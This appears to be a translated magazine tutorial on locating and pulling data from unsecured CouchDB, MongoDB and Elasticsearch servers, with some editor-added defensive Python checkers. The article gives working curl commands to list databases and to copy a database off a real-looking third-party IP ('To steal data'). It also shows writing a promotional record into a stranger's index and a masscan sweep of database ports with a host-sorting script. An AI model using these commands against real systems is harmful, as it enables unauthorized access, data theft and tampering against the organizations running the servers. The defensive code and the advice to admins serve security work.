News portals report large-scale data leaks nearly on a daily basis. Such accidents occur with all kinds of computer systems all over the world; the severity of their consequences varies from devastating to disastrous. In this article, I will show how easy it is to gain access to vast arrays of data.
Warning
This article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this information. Remember: unauthorized access to information is punishable by law.
Prior to describing the attacks, I have to explain why in the world such attacks are possible, and why admins and the people supposed to protect databases don't do their job properly.
- The entrance threshold for using modern databases keeps going down, and so does the general IT security level. Accordingly, it becomes increasingly easy for a novice 'anykeyer' to gain admin rights to a service that requires careful and sophisticated configuration and at least basic knowledge of the specific product. Fortunately for such 'engineers', and unfortunately for the owners of the leaked data, many network services (e.g. databases) can be deployed "in one click". To install such a service, you don't have to understand how it works or what threatens it. In the best case, the newly installed database is configured according to instructions found via Google. In the worst case, it is not configured at all.
- Authentication is often disabled "for the convenience of data management". As a result, the port (or even the DBMS interface) is visible and accessible to everyone. Just come in and do whatever you want.
- The boss wants everything done as cheaply as possible and refuses to pay the fees of skilled specialists. As a result, a designer, an accountant, or a janitor may be asked to install and configure a database for the company in exchange for a cup of coffee. Needless to say, security is out of the question in such situations: it's great if at least a password is set...
Overall, the main reason for data leaks is lazy admins and unsafe DBMS configurations that stem from a lack of attention and knowledge.
DBMS frequently attacked by hackers
As you are likely aware, a DBMS is a database management system: software that provides a mechanism for storing and searching data.
CouchDB
CouchDB is an open-source NoSQL database developed by the Apache Software Foundation and implemented in Erlang.
The DB supports two connection methods:
- HTTP API (the default port is 5984); and
- the Futon web interface.
The DB is accessed over HTTP using a JSON API, which allows data to be accessed from web apps running in your browser. The database has its own graphical interface (Futon).
But I am going to use the classic curl tool. Below is a standard greeting request:
curl http://127.0.0.1:5984/
The response includes the version number, vendor name, and git commit hash of the build:
{
"couchdb":"Welcome","version":"2.3.1",
"git_sha":"c298091a4",
"uuid":"777dc19849f3ff0392ba09dec1a62fa7",
"features":["pluggable-storage-engines","scheduler"],
"vendor":{"name":"The Apache Software Foundation"}
}
To view the list of all DBs deployed on the server, use the following command:
curl http://127.0.0.1:5984/_all_dbs
The response is as follows:
[
"_replicator",
"_users",
"mychannel_",
"mychannel_kizuna-chaincode",
"mychannel_lscc",
"mychannel_user"
]
In this case, _replicator and _users are standard databases.
You may also get an error message in response:
{
"error":"unauthorized",
"reason":"You are not a server admin."
}
If so, forget about this host: you won't get anything from it. Its configuration doesn't allow an anonymous user even to see the list of databases deployed on the server, let alone connect to them. However, you may try to guess the password. Below is a request with authorization credentials:
curl -X PUT http://localhost:5984/test -u "login:password"
You don't have to install additional software to connect to the graphical interface; all you have to do is open the following address in your browser:
http://127.0.0.1:5984/_utils/
To steal data, use the following request:
curl -X POST -d '{"source":"http://54.161.77.240:5984/klaspadchannel_","target":"http://localhost:5984/klaspadchannel_"}' http://localhost:5984/_replicate -H "Content-Type: application/json"
Of course, you have to deploy a CouchDB server on your local PC. But if you are going to deal with this DB, it's logical to assume that you have already done this, right?
MongoDB
MongoDB is a cross-platform document-oriented database. Its main advantages are high performance and scalability. The DB is built around collections and documents. MongoDB supports two connection methods:
- HTTP API (the default port is 27017); and
- the Robo 3T client.
To get some basic information about a found database, send a simple GET request to the API port:
curl -X GET http://114.116.117.104:27017
The received information is pretty scarce: without a database driver, you can only check whether a DB is deployed on the server or not.
If MongoDB is really running on this port, the answer will be as follows:
It looks like you are trying to access MongoDB over HTTP on the native driver port.
This is sufficient to start a manual check using the graphical client.
Data stolen from the attacked DB can be dumped using the GUI.
Elasticsearch
Elasticsearch is a clustered NoSQL database with a JSON REST API that uses Lucene for full-text search. The program is written in Java. From the attacker's perspective, it is a storage of documents in JSON format.
An Elasticsearch DB can be scaled up to a petabyte of structured and unstructured data. The data in its indexes are divided into one or several shards. This lets Elasticsearch scale to sizes that no single PC can handle. This is why Elasticsearch is a distributed system; its maximum storage volume is hard to estimate, but it can reach petabytes and more.
The DB supports two connection methods:
- HTTP API (the default port is 9200); and
- the Kaizen graphical client available on the official website.
Interaction with the HTTP API is very simple. First, request a greeting. For security reasons, a portion of the test server's address is omitted:
curl -XGET http://47.99.X.X:9200/
If you have really found an Elasticsearch DB, the response should look something like this:
{
"name" : "node-2",
"cluster_name" : "es",
"cluster_uuid" : "q10ZJxLIQf-ZRZIC0kDkGQ",
"version" : {
"number" : "5.5.1",
"build_hash" : "19c13d0",
"build_date" : "2017-07-18T20:44:24.823Z",
"build_snapshot" : false,
"lucene_version" : "6.6.0"
},
"tagline" : "You Know, for Search"
}
To list all the DB indices, type:
curl -XGET http://47.99.X.X:9200/_cat/indices\?v
The response will be something like:
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open bdp-interface x3DLdQRyTK2jssMvIJ3FmA 5 1 32576 28 428.9mb 214.4mb
green open onair-vlog Vsq0srUGSk2NvvYmXpxMBw 5 1 22 0 931.9kb 465.9kb
green open meizidb PCybF4SvTdSt1BoOCYLxNw 5 1 5328 1 27.9mb 13.9mb
green open rms-resource R6c3U5_pQgG71huRD0OdDA 5 1 125827 36 1.2gb 636.2mb
To find out what fields are stored in the DB, use the following command:
curl -XGET http://47.99.X.X:9200/meizidb
Response:
{
"meizidb":{
"aliases":{},
"mappings":{
"assets":{
"dynamic_templates":[{"string":{
"match_mapping_type":"string",
"mapping":{"type":"keyword"}
}}],
"properties":{
"annexList":{
"properties":{
"annexFileId":{"type":"keyword"},
"annexName":{"type":"keyword"},
"annexSize":{"type":"long"},
"annexThumbUrl":{"type":"keyword"},
"annexType":{"type":"keyword"},
"annexUrl":{"type":"keyword"}
}
},
"appCode":{"type":"keyword"},
"asrText":{"type":"text","index_options":"offsets","analyzer":"ik_max_word"},
"assetsType":{"type":"keyword"},
"cdetail":{
"properties":{
"SP":{"type":"keyword"},
"jz":{"type":"keyword"},
"src":{"type":"keyword"},
"tag":{"type":"keyword"},
"type":{"type":"keyword"}
}
},
"companyId":{"type":"keyword"},
"companyName": ...
}
You can even enter new records. But I strongly advise against that: committing such actions without the prior consent of the server owner may expose you to criminal charges.
curl -X POST http://47.99.X.X:9200/onair-vlog/catalogue/1 -H 'Content-Type: application/json' -d @- << EOF
{
"username" : "KassNT",
"subject" : "My Referal url: ",
"referal" : "https://xakep.ru/paywall/form/?init&code=xakep-promo-KassNT"
}
EOF
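The three probes above (CouchDB's /_all_dbs, the MongoDB banner on the driver port, and Elasticsearch's /_cat/indices?v) can be turned into a self-check for an admin who wants to know what their own servers reveal to an unauthenticated request. The Python below is an added example written while editing this article, not code from the original text; it works on response bodies you fetch yourself (with curl, as above) and classifies them. The sample bodies inside it are constructed to match the shapes quoted above and were not captured from any real host.

```python
import json

# Constructed sample responses shaped like those quoted in the article;
# none of them was captured from a real host.
COUCH_OPEN_LISTING = '["_replicator","_users","mychannel_","mychannel_user"]'
COUCH_AUTH_REQUIRED = '{"error":"unauthorized","reason":"You are not a server admin."}'
MONGO_DRIVER_PORT_BANNER = (
    "It looks like you are trying to access MongoDB over HTTP "
    "on the native driver port."
)
ES_CAT_INDICES = """\
health status index uuid pri rep docs.count docs.deleted store.size pri.store.size
green open bdp-interface x3DLdQRyTK2jssMvIJ3FmA 5 1 32576 28 428.9mb 214.4mb
green open meizidb PCybF4SvTdSt1BoOCYLxNw 5 1 5328 1 27.9mb 13.9mb
"""


def couchdb_exposure(all_dbs_body):
    """Classify the body returned by GET /_all_dbs on one of our own CouchDB hosts."""
    try:
        data = json.loads(all_dbs_body)
    except ValueError:
        return "not-couchdb"
    if isinstance(data, list):
        # A bare JSON array means the database list is readable without credentials.
        return "anonymous-listing"
    if isinstance(data, dict) and data.get("error") == "unauthorized":
        return "auth-required"
    return "unknown"


def is_mongodb_driver_port(body):
    """True when the body is the banner MongoDB sends to an HTTP request on port 27017."""
    return "trying to access MongoDB over HTTP" in body


def parse_cat_indices(body):
    """Parse the whitespace table returned by GET /_cat/indices?v into dicts."""
    lines = [line for line in body.splitlines() if line.strip()]
    if not lines:
        return []
    header = lines[0].split()
    rows = []
    for line in lines[1:]:
        fields = line.split()
        if len(fields) != len(header):
            continue  # not a table row (e.g. part of an error message)
        row = dict(zip(header, fields))
        row["docs.count"] = int(row["docs.count"])
        row["docs.deleted"] = int(row["docs.deleted"])
        rows.append(row)
    return rows


def elasticsearch_exposure(cat_indices_body):
    """Summarise what an unauthenticated GET /_cat/indices?v reveals."""
    rows = parse_cat_indices(cat_indices_body)
    if not rows:
        # No table came back: the request was refused or this is not Elasticsearch.
        return {"status": "no-anonymous-listing", "indices": 0, "documents": 0}
    return {
        "status": "anonymous-listing",
        "indices": len(rows),
        "documents": sum(r["docs.count"] for r in rows),
        "largest": max(rows, key=lambda r: r["docs.count"])["index"],
    }


if __name__ == "__main__":
    print("CouchDB (open):  ", couchdb_exposure(COUCH_OPEN_LISTING))
    print("CouchDB (locked):", couchdb_exposure(COUCH_AUTH_REQUIRED))
    print("MongoDB banner:  ", is_mongodb_driver_port(MONGO_DRIVER_PORT_BANNER))
    print("Elasticsearch:   ", elasticsearch_exposure(ES_CAT_INDICES))
```

Feed each function the body of a curl call against your own host. An "anonymous-listing" result is exactly the state the article warns about: the database list (CouchDB) or the full index table with document counts (Elasticsearch) is readable by anyone who can reach the port, so the fix is to require authentication and to stop exposing the port to the outside.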
Manual search
You can search for test hosts in two ways.
The first way involves online services that scan the entire world and provide information about hosts through search operators. The following engines can be used to find suitable targets:
I am not going to describe each search engine in detail; instead, I will provide a few practical examples. For instance, a request for MongoDB in Fofa brings the following results.
Another similar service is Zoomeye.org. Below are the results of a request for hosts running CouchDB.
To demonstrate the performance of Shodan, I am going to use the console utility of the same name. The results brought by the request [ … ] are shown on the screenshot below.
The second way involves manual scanners:
- Nmap;
- Masscan;
- Zmap from theZmap.io package;
- Project Sonar; and
- Your handmade utilities.
Even though these scans are formally manual, you can make your life easier by using ready-made datasets. For instance, if a VPS provider does not allow you to scan at high speed, Project Sonar comes to the rescue.
Within this research project, services and protocols are scanned to assess the global impact of common vulnerabilities. Its developer is Rapid7, the creator of the almighty Metasploit Framework. The collected data are available to the general public for security-related studies.
The TCP Scans section is of the utmost interest: it contains the results of scans of IP addresses conducted to identify open ports used by various services. Take, for instance, the dataset with survey results for port 9200 (Elasticsearch).
TCP Scans
Lines: 3472740
1602049426,146.148.230.26,9200,71.6.233.15,9200,54321,248
1602049426,34.102.229.177,9200,71.6.233.70,9200,60681,122
1602049426,104.232.64.108,9200,71.6.233.105,9200,54321,248
1602049426,164.116.204.58,9200,71.6.233.79,9200,38329,242
1602049426,35.186.233.76,9200,71.6.233.7,9200,44536,122
1602049426,192.43.242.72,9200,71.6.233.113,9200,19234,56
1602049426,166.241.202.174,9200,71.6.233.47,9200,26802,242
1602049426,142.92.75.134,9200,71.6.233.115,9200,28081,243
1602049426,198.86.33.87,9200,71.6.233.112,9200,17403,59
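An admin can use the same public dataset defensively: instead of hunting for targets, match the responders against the organization's own address ranges to learn which of its hosts answered a probe on port 9200 before anyone else acts on that information. The Python below is an added example, not part of the article or of Project Sonar. It assumes the column layout timestamp_ts, saddr, sport, daddr, dport, ipid, ttl with saddr as the host that answered and daddr as the scanner (an assumption about the dataset, not something the article states); its sample rows copy the shape shown above, and the "own" prefixes are constructed for the demo.

```python
import csv
import ipaddress
from io import StringIO

# Assumed column layout of the Project Sonar TCP-scan CSV: saddr is the host that
# answered the probe, daddr the scanner that sent it (assumption, not from the article).
COLUMNS = ["timestamp_ts", "saddr", "sport", "daddr", "dport", "ipid", "ttl"]

# Constructed excerpt in the shape of the port-9200 dataset quoted above.
SONAR_EXCERPT = """\
1602049426,146.148.230.26,9200,71.6.233.15,9200,54321,248
1602049426,34.102.229.177,9200,71.6.233.70,9200,60681,122
1602049426,104.232.64.108,9200,71.6.233.105,9200,54321,248
1602049426,164.116.204.58,9200,71.6.233.79,9200,38329,242
"""


def parse_sonar_rows(text):
    """Yield one dict per CSV row; tolerant of stray spaces and quotes from copy-paste."""
    for fields in csv.reader(StringIO(text)):
        cleaned = [f.strip().strip("'\u2018\u2019") for f in fields]
        if len(cleaned) != len(COLUMNS):
            continue
        row = dict(zip(COLUMNS, cleaned))
        try:
            yield {
                "time": int(row["timestamp_ts"]),
                "host": ipaddress.ip_address(row["saddr"]),
                "port": int(row["sport"]),
            }
        except ValueError:
            continue  # header line or malformed row


def hosts_in_our_ranges(text, our_prefixes, port=None):
    """Return sorted responder addresses inside the given prefixes (optionally for one port)."""
    nets = [ipaddress.ip_network(p, strict=False) for p in our_prefixes]
    found = set()
    for row in parse_sonar_rows(text):
        if port is not None and row["port"] != port:
            continue
        if any(row["host"] in net for net in nets):
            found.add(row["host"])
    return sorted(str(h) for h in found)


if __name__ == "__main__":
    # "Our" prefixes are constructed for the demo; they are not anyone's real allocation.
    print(hosts_in_our_ranges(SONAR_EXCERPT, ["146.148.230.0/24", "34.102.0.0/16"], port=9200))
```

Run it over the full dataset file with your real prefixes; every address it returns is a host that answered on the Elasticsearch port from the public internet and deserves the same checks the article applies to strangers' servers, this time on your own.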
The following command is used to run Masscan:
masscan -p9200,9042,5984,27017 10.0.0.0/8 --echo > result.txt
After getting a list of hosts, you can start their detailed examination.
Here you can see that port 9200 is open, and the Elasticsearch service is running on it.
The combined use of search engines and manual scans brings plenty of interesting information. The screenshots below show just a few examples.
To my surprise, I found lists of first names, nicknames, and last names (with references to specific Telegram, VK, or Viber accounts), as well as 16 databases containing 15-20 thousand rows each (see below).
Price of carelessness
Time to show what happens to lazy admins who don't take proper care of their misconfigured DBs. In brief, their data 'leak' into limbo, and they get ransom demands like the one shown below.
You can use the show command to see who has stolen the data and how.
As you can see, the attacker has logged in, deleted the data, and left a README note.
A review of the logs shows that the "ransom demand" was overwritten many times: every time a malicious bot finds an open database, the demand is replaced with a new one.
The bot checks whether it can authenticate and gain write access, then deletes all the data and leaves a note to the grieving owner.
Of course, the attackers neither return the data nor back them up prior to the destruction, so don't trust their notes and abandon any hope of their honesty.
Automation
To expedite searches for DBMS, I wrote a short script that operates on lists in the ip:port format. The script performs the following operations:
- opens the specified file for reading;
- splits ip:port by the separator character and saves this information into a variable;
- uses curl to address the host saved in the variable over HTTP;
- reads the http_response received from the host (the host response time is limited to 4 seconds);
- based on the received http_response, saves the host either to the 'success' file or to the 'garbage' file.
The operations are performed in a cycle until the input file has been read completely.
# Loop body: $LINE holds one "ip:port" entry read from the input file.
echo "$LINE" | cut -d":" -f1,2
# Request the host over HTTP and keep only the status code; give up after 4 seconds.
HTTP_CODE=$(curl --write-out "%{http_code}\n" "http://$LINE" --output output.txt --silent --connect-timeout 4)
if [ "$HTTP_CODE" = "200" ]; then
echo "##########################--HTTP_API_FOUND--#########################";
echo "$LINE" >> result.txt
else
echo "Tried to access it, but f'ed up";
echo "$LINE" >> trash_bin.txt
fi
Since the distribution of such scripts can be interpreted as the creation of malicious programs, the above code is not fully operational. I strongly recommend exercising caution should you decide to write something like this.
As you can see, searches for potential targets and even their subsequent 'processing' can be easily automated.
Conclusions
Of course, this article does not cover all vulnerable DB types, only the most frequently 'leaking' ones. The message is clear: if you are an admin, you must be aware of the potential attack vectors. Scan your servers on a regular basis to identify holes before they are found by malefactors. Close all unnecessary ports by default. Hide endpoints behind authentication and generate strong passwords. And of course, back up your data on a regular basis in case someone's bot finds and destroys them.
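To put the "scan your servers on a regular basis" advice into practice, here is an added Python example (not from the article) that checks an inventory of your own hosts for the database ports discussed above (5984, 27017, 9200, and the 9042 from the masscan command). It uses only the standard library. The local listener at the end is a stand-in so the check can be tried without a real database; the inventory and port table are the editor's assumptions, not values from the article.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Default ports of the services covered in the article, plus Cassandra's 9042
# from the masscan command; edit to match what you actually run.
DB_PORTS = {5984: "CouchDB", 27017: "MongoDB", 9200: "Elasticsearch", 9042: "Cassandra"}


def port_is_open(host, port, timeout=2.0):
    """True if a TCP connection to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def open_db_ports(host, ports=tuple(DB_PORTS), timeout=2.0):
    """Return the subset of ports that accept connections on host, in ascending order."""
    ports = list(ports)
    workers = min(8, len(ports)) or 1
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda p: port_is_open(host, p, timeout), ports))
    return sorted(p for p, ok in zip(ports, flags) if ok)


def audit_inventory(hosts, timeout=2.0):
    """Map each inventoried host to the database ports found open on it."""
    return {host: open_db_ports(host, timeout=timeout) for host in hosts}


def start_local_listener():
    """Open a throwaway listener on 127.0.0.1 so the checker can be tried offline."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    srv.listen(5)
    return srv, srv.getsockname()[1]


if __name__ == "__main__":
    # Constructed inventory: only the loopback host, with a stand-in listener playing
    # the role of a database nobody remembered deploying.
    srv, port = start_local_listener()
    print("real DB ports on 127.0.0.1:", audit_inventory(["127.0.0.1"]))
    print("stand-in listener found:", open_db_ports("127.0.0.1", [port, 9200]))
    srv.close()
```

Run audit_inventory against the list of hosts you are responsible for, from outside your network as well as from inside; any port it reports that you did not expect is exactly the kind of finding the search engines and bots described in this article would make for you otherwise.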